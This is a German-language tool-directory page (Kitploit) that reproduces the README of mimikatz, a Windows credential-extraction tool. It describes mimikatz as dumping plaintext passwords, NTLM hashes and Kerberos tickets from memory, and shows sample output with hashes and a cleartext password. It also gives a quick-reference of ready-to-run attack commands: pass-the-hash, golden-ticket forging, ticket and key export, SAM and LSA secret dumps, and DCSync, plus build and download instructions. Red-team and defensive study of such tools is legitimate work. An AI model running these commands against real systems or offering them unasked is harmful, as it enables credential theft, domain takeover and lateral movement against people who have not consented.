Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mimikatz — Ein kleines Tool zum Spielen mit der Windows-Sicherheit. | Kitploit
Tools/GitHubGitHub/gentilkiwi/mimikatz
Passwort-CrackingPenetrationstest-FrameworksExploit-FrameworksPasswortangriffePersistenzmechanismenExploitationHash-AnalyseLaterale BewegungPost-ExploitationPenetrationstestsAuthentifizierungRed Teaming
21.8k4.2k57vor 4 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Payload-Entwicklung
Top in Exploitation Nr.12
Top in Exploit-Frameworks Nr.15
Top in Hash-Analyse Nr.20
Top in Laterale Bewegung Nr.20
Top in Passwortangriffe Nr.9
Top in Passwort-Cracking Nr.9
Top in Penetrationstest-Frameworks Nr.15
Top in Persistenzmechanismen Nr.11
Top in Post-Exploitation Nr.3
Top in Red Teaming Nr.10
GitHubgentilkiwi/mimikatz

mimikatz

Ein kleines Tool zum Spielen mit der Windows-Sicherheit.

Repository anzeigenWebseite

mimikatz

mimikatz ist ein Tool, das ich erstellt habe, um C zu lernen und ein paar Experimente mit der Windows-Sicherheit durchzuführen.

Es ist mittlerweile bekannt dafür, Klartext-Passwörter, Hashes, PIN-Codes und Kerberos-Tickets aus dem Speicher zu extrahieren. mimikatz kann auch Pass-the-Hash, Pass-the-Ticket oder Golden Tickets erstellen.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

Aber das ist noch nicht alles! Crypto, Terminal Server, Events, ... viele Informationen im GitHub-Wiki https://github.com/gentilkiwi/mimikatz/wiki oder auf https://blog.gentilkiwi.com (auf Französisch, ja).

Wenn Sie es nicht selbst bauen möchten, sind Binärdateien verfügbar unter https://github.com/gentilkiwi/mimikatz/releases

Kurzanleitung

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz liegt in Form einer Visual Studio Solution und eines WinDDK-Treibers vor (optional für Hauptfunktionen), daher sind Voraussetzungen:

  • für mimikatz und mimilib: Visual Studio 2010, 2012 oder 2013 für Desktop (2013 Express für Desktop ist kostenlos und unterstützt x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • für mimikatz driver, mimilove (und ddk2003-Plattform): Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz verwendet SVN zur Quellcodeverwaltung, ist aber jetzt auch mit GIT verfügbar! Sie können jedes beliebige Tool zum Synchronisieren verwenden, sogar das integrierte GIT in Visual Studio 2013 =)

Synchronisieren!

  • GIT-URL ist: https://github.com/gentilkiwi/mimikatz.git
  • SVN-URL ist: https://github.com/gentilkiwi/mimikatz/trunk
  • ZIP-Datei ist: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Die Lösung erstellen

  • Nach dem Öffnen der Lösung: Build / Build Solution (Sie können die Architektur ändern)
  • mimikatz ist jetzt erstellt und einsatzbereit! (Win32 / x64 sogar ARM64, wenn Sie Glück haben)
    • Möglicherweise erhalten Sie den Fehler MSB3073 bezüglich _build_.cmd und mimidrv. Dies liegt daran, dass der Treiber ohne Windows Driver Kit 7.1 (WinDDK) nicht erstellt werden kann, aber mimikatz und mimilib sind in Ordnung.

ddk2003

Mit dieser optionalen MSBuild-Plattform können Sie die WinDDK-Build-Tools und die Standard-Laufzeit msvcrt verwenden (kleinere Binärdateien, keine Abhängigkeiten).

Für diese optionale Plattform sind Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 und Visual Studio 2010 zwingend erforderlich, auch wenn Sie später Visual Studio 2012 oder 2013 verwenden möchten.

Befolgen Sie die Anweisungen:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Continuous Integration

Das mimikatz-Projekt ist auf AppVeyor verfügbar - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Sein Status ist: AppVeyor CI status

Lizenz

CC BY 4.0-Lizenz - https://creativecommons.org/licenses/by/4.0/

mimikatz braucht Kaffee, um entwickelt zu werden:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, Sie können mich auf Twitter (@gentilkiwi) oder per E-Mail (benjamin [at] gentilkiwi.com) kontaktieren.
  • DCSync- und DCShadow-Funktionen im Modul lsadump wurden gemeinsam mit Vincent LE TOUX entwickelt. Sie können ihn per E-Mail (vincent.letoux [at] gmail.com) kontaktieren oder seine Website besuchen (http://www.mysmartlogon.com)

Dies ist eine persönliche Entwicklung, bitte respektieren Sie ihre Philosophie und verwenden Sie sie nicht für schlechte Dinge!

Tool herunterladen